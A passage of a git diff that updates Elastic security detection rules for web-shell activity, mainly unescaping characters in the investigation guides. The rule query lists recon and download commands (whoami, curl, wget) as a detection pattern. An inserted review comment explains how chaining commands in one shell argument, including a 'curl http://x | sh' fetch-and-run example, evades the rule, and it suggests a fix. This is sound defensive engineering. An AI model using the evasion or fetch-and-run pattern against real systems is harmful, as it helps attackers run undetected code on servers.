A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"*sh\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\")\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json index 3b0fc8c70d9..638779aabcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json 
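Review bot: The `query` context line at the end of this hunk gates the alert on `process.args : ("whoami", "id", "uname", "cat", "hostname", "ip", "curl", "wget", "pwd")`, and since EQL `:` compares each argument element as a whole (case-insensitive, wildcards only where written), a web shell that runs `sh -c "whoami; id"` or `sh -c "curl http://x | sh"` yields a single argument that equals none of those tokens, so the shell spawned directly by the web server is not matched and the later `whoami` child has `sh` rather than the web server as its parent; this looks like a straightforward evasion of the rule as written, though the exact event shaping depends on the endpoint integration and is worth confirming. The change in this hunk is only the `\u003e` to `>` unescape in `note`, so any tuning belongs in the upstream rule, but the obvious option is wildcarding the tokens, e.g. `process.args : ("*whoami*", "*uname*", "*hostname*", "*curl*", "*wget*", ...)`, accepting that short tokens such as `id` and `ip` then need a tighter form to avoid noise. The investigation guide's false-positive section states the activity "is unlikely to happen legitimately", which is true of the chained form as well, so the narrowness of the match should be called out there so analysts do not read a lack of alerts as absence of web-shell activity.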
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. 
This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"*sh\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\") and\nnot process.name == \"phpquery\"\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json index 8a95cd3cd75..d728b8e7929 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. 
This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\") and\nnot process.name == \"phpquery\"\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json index ad07881a5da..46d100b888d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json 
+++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. 
This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\") and\nnot process.name == \"phpquery\"\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": 